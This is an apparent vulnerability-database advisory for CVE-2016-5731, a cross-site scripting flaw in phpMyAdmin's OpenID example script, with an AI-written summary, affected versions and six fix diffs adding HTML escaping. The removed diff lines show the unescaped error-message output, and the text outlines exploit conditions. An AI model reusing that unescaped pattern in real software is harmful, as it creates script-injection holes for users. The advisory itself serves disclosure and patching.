VYPR
← All advisories
Medium severity6.1NVD Advisory· Published Jul 3, 2016· Updated May 6, 2026

CVE-2016-5731

CVE-2016-5731

Description

Cross-site scripting (XSS) vulnerability in examples/openid.php in phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before 4.6.3 allows remote attackers to inject arbitrary web script or HTML via vectors involving an OpenID error message.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Cross-site scripting (XSS) vulnerability in phpMyAdmin's OpenID example script allows remote attackers to inject arbitrary web script or HTML via crafted OpenID error messages.

Vulnerability

A cross-site scripting (XSS) vulnerability exists in the examples/openid.php script of phpMyAdmin. The script does not properly sanitize OpenID error messages, allowing an attacker to inject arbitrary web script or HTML. This affects phpMyAdmin versions 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before 4.6.3 [1][3].

Exploitation

An attacker can exploit this vulnerability by crafting a malicious OpenID request that includes a specially crafted error message. The attack requires the PHP setting html_errors to be set to Off in php.ini [3]. No authentication is needed; the attacker only needs to trick a user into visiting a crafted URL or interacting with the vulnerable script.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser, leading to potential information disclosure, session hijacking, or other client-side attacks. The impact is limited to the user's session and does not directly compromise the server [1][3].

Mitigation

Upgrade to phpMyAdmin 4.6.3, 4.4.15.7, or 4.0.10.16 or later [3]. Alternatively, set html_errors = On in php.ini to mitigate the attack, or remove the ./examples/openid.php file entirely [3]. No workaround is needed if the file is not used.

References
  1. NVD - CVE-2016-5731
  2. PMASA-2016-24

AI Insight generated on May 23, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
phpmyadmin/phpmyadminPackagist
>= 4.0, < 4.0.10.164.0.10.16
phpmyadmin/phpmyadminPackagist
>= 4.4, < 4.4.15.74.4.15.7
phpmyadmin/phpmyadminPackagist
>= 4.6, < 4.6.34.6.3

Affected products

65
  • PhpMyAdmin/phpMyAdmin60 versions
    cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:*:*:*:*:*:*:*+ 59 more
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.10:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.11:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.12:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.13:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.14:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.15:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.2:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.3:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.4:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.5:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.6:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.7:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.8:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.9:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.2:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.3:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.2:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.5:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.6:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.7:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.8:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.9:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.0:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.10:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.1.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.11:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.12:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.13:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.13.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.14.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.2:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.3:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.4:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.5:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.15.6:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.2:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.3:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.4:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.5:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.6:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.6.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.7:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.8:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.4.9:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.0:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.0:alpha1:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.0:rc1:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.0:rc2:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.1:*:*:*:*:*:*:*
    • cpe:2.3:a:phpmyadmin:phpmyadmin:4.6.2:*:*:*:*:*:*:*
    • (no CPE)range: 4.0.x < 4.0.10.16, 4.4.x < 4.4.15.7, 4.6.x < 4.6.3
  • OpenSUSE/Leap
    cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*
  • OpenSUSE/openSUSE2 versions
    cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*+ 1 more
    • cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*
    • cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*
  • ghsa-coords2 versions
    pkg:composer/phpmyadmin/phpmyadminpkg:rpm/opensuse/phpMyAdmin&distro=openSUSE%20Tumbleweed
    >= 4.0, < 4.0.10.16+ 1 more
    • (no CPE)range: >= 4.0, < 4.0.10.16
    • (no CPE)range: < 4.6.5.2-1.1

Patches

6
78f6c54

Add error handling to constructing openid message

https://github.com/phpmyadmin/phpmyadminMichal ČihařJun 17, 2016via ghsa
commit
1 file changed · +17 11
  • examples/openid.php+17 11 modified
    @@ -61,6 +61,16 @@ function show_page($contents)
 <?php
 }
 
+function die_error($e)
+{
+    $contents = "<div class='relyingparty_results'>\n";
+    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
+    $contents .= "</div class='relyingparty_results'>";
+    show_page($contents);
+    exit;
+}
+
+
 /* Need to have cookie visible from parent directory */
 session_set_cookie_params(0, '/', '', 0);
 /* Create signon session */
@@ -108,23 +118,15 @@ function show_page($contents)
 try {
     $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
 } catch (Exception $e) {
-    $contents = "<div class='relyingparty_results'>\n";
-    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
-    $contents .= "</div class='relyingparty_results'>";
-    show_page($contents);
-    exit;
+    die_error($e);
 }
 
 /* Redirect to OpenID provider */
 if (isset($_POST['start'])) {
     try {
         $authRequest = $o->prepare();
     } catch (Exception $e) {
-        $contents = "<div class='relyingparty_results'>\n";
-        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
-        $contents .= "</div class='relyingparty_results'>";
-        show_page($contents);
-        exit;
+        die_error($e);
     }
 
     $url = $authRequest->getAuthorizeURL();
@@ -141,7 +143,11 @@ function show_page($contents)
     }
 
     /* Check reply */
-    $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
+    try {
+        $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
+    } catch (Exception $e) {
+        die_error($e);
+    }
 
     $id = $message->get('openid.claimed_id');
d005ba6

Add error handling to constructing openid message

https://github.com/phpmyadmin/phpmyadminMichal ČihařJun 17, 2016via ghsa
commit
1 file changed · +17 11
  • examples/openid.php+17 11 modified
    @@ -63,6 +63,16 @@ function Show_page($contents)
     <?php
 }
 
+function Die_error($e)
+{
+    $contents = "<div class='relyingparty_results'>\n";
+    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
+    $contents .= "</div class='relyingparty_results'>";
+    Show_page($contents);
+    exit;
+}
+
+
 /* Need to have cookie visible from parent directory */
 session_set_cookie_params(0, '/', '', false);
 /* Create signon session */
@@ -110,23 +120,15 @@ function Show_page($contents)
 try {
     $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
 } catch (Exception $e) {
-    $contents = "<div class='relyingparty_results'>\n";
-    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
-    $contents .= "</div class='relyingparty_results'>";
-    Show_page($contents);
-    exit;
+    Die_error($e);
 }
 
 /* Redirect to OpenID provider */
 if (isset($_POST['start'])) {
     try {
         $authRequest = $o->prepare();
     } catch (Exception $e) {
-        $contents = "<div class='relyingparty_results'>\n";
-        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
-        $contents .= "</div class='relyingparty_results'>";
-        Show_page($contents);
-        exit;
+        Die_error($e);
     }
 
     $url = $authRequest->getAuthorizeURL();
@@ -143,7 +145,11 @@ function Show_page($contents)
     }
 
     /* Check reply */
-    $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
+    try {
+        $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
+    } catch (Exception $e) {
+        Die_error($e);
+    }
 
     $id = $message->get('openid.claimed_id');
418aeea3d83b

Add error handling to constructing openid message

https://github.com/phpmyadmin/phpmyadminMichal ČihařJun 17, 2016via ghsa
commit
1 file changed · +17 11
  • examples/openid.php+17 11 modified
    @@ -63,6 +63,16 @@ function Show_page($contents)
     <?php
 }
 
+function Die_error($e)
+{
+    $contents = "<div class='relyingparty_results'>\n";
+    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
+    $contents .= "</div class='relyingparty_results'>";
+    Show_page($contents);
+    exit;
+}
+
+
 /* Need to have cookie visible from parent directory */
 session_set_cookie_params(0, '/', '', false);
 /* Create signon session */
@@ -110,23 +120,15 @@ function Show_page($contents)
 try {
     $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
 } catch (Exception $e) {
-    $contents = "<div class='relyingparty_results'>\n";
-    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
-    $contents .= "</div class='relyingparty_results'>";
-    Show_page($contents);
-    exit;
+    Die_error($e);
 }
 
 /* Redirect to OpenID provider */
 if (isset($_POST['start'])) {
     try {
         $authRequest = $o->prepare();
     } catch (Exception $e) {
-        $contents = "<div class='relyingparty_results'>\n";
-        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
-        $contents .= "</div class='relyingparty_results'>";
-        Show_page($contents);
-        exit;
+        Die_error($e);
     }
 
     $url = $authRequest->getAuthorizeURL();
@@ -143,7 +145,11 @@ function Show_page($contents)
     }
 
     /* Check reply */
-    $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
+    try {
+        $message = new OpenID_Message($queryString, OpenID_Message::FORMAT_HTTP);
+    } catch (Exception $e) {
+        Die_error($e);
+    }
 
     $id = $message->get('openid.claimed_id');
94cf3864254f

Escape error messages from OpenID

https://github.com/phpmyadmin/phpmyadminMichal ČihařJun 17, 2016via ghsa
commit
1 file changed · +3 3
  • examples/openid.php+3 3 modified
    @@ -111,7 +111,7 @@ function Show_page($contents)
     $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
 } catch (Exception $e) {
     $contents = "<div class='relyingparty_results'>\n";
-    $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
+    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
     $contents .= "</div class='relyingparty_results'>";
     Show_page($contents);
     exit;
@@ -121,9 +121,9 @@ function Show_page($contents)
 if (isset($_POST['start'])) {
     try {
         $authRequest = $o->prepare();
-    } catch (OpenID_Exception $e) {
+    } catch (Exception $e) {
         $contents = "<div class='relyingparty_results'>\n";
-        $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
+        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
         $contents .= "</div class='relyingparty_results'>";
         Show_page($contents);
         exit;
52e7898

Escape error messages from OpenID

https://github.com/phpmyadmin/phpmyadminMichal ČihařJun 17, 2016via ghsa
commit
1 file changed · +3 3
  • examples/openid.php+3 3 modified
    @@ -111,7 +111,7 @@ function Show_page($contents)
     $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
 } catch (Exception $e) {
     $contents = "<div class='relyingparty_results'>\n";
-    $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
+    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
     $contents .= "</div class='relyingparty_results'>";
     Show_page($contents);
     exit;
@@ -121,9 +121,9 @@ function Show_page($contents)
 if (isset($_POST['start'])) {
     try {
         $authRequest = $o->prepare();
-    } catch (OpenID_Exception $e) {
+    } catch (Exception $e) {
         $contents = "<div class='relyingparty_results'>\n";
-        $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
+        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
         $contents .= "</div class='relyingparty_results'>";
         Show_page($contents);
         exit;
5fefa51

Escape error messages from OpenID

https://github.com/phpmyadmin/phpmyadminMichal ČihařJun 17, 2016via ghsa
commit
1 file changed · +3 3
  • examples/openid.php+3 3 modified
    @@ -109,7 +109,7 @@ function show_page($contents)
     $o = new OpenID_RelyingParty($returnTo, $realm, $identifier);
 } catch (Exception $e) {
     $contents = "<div class='relyingparty_results'>\n";
-    $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
+    $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
     $contents .= "</div class='relyingparty_results'>";
     show_page($contents);
     exit;
@@ -119,9 +119,9 @@ function show_page($contents)
 if (isset($_POST['start'])) {
     try {
         $authRequest = $o->prepare();
-    } catch (OpenID_Exception $e) {
+    } catch (Exception $e) {
         $contents = "<div class='relyingparty_results'>\n";
-        $contents .= "<pre>" . $e->getMessage() . "</pre>\n";
+        $contents .= "<pre>" . htmlspecialchars($e->getMessage()) . "</pre>\n";
         $contents .= "</div class='relyingparty_results'>";
         show_page($contents);
         exit;

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

14

News mentions

0

No linked articles in our index yet.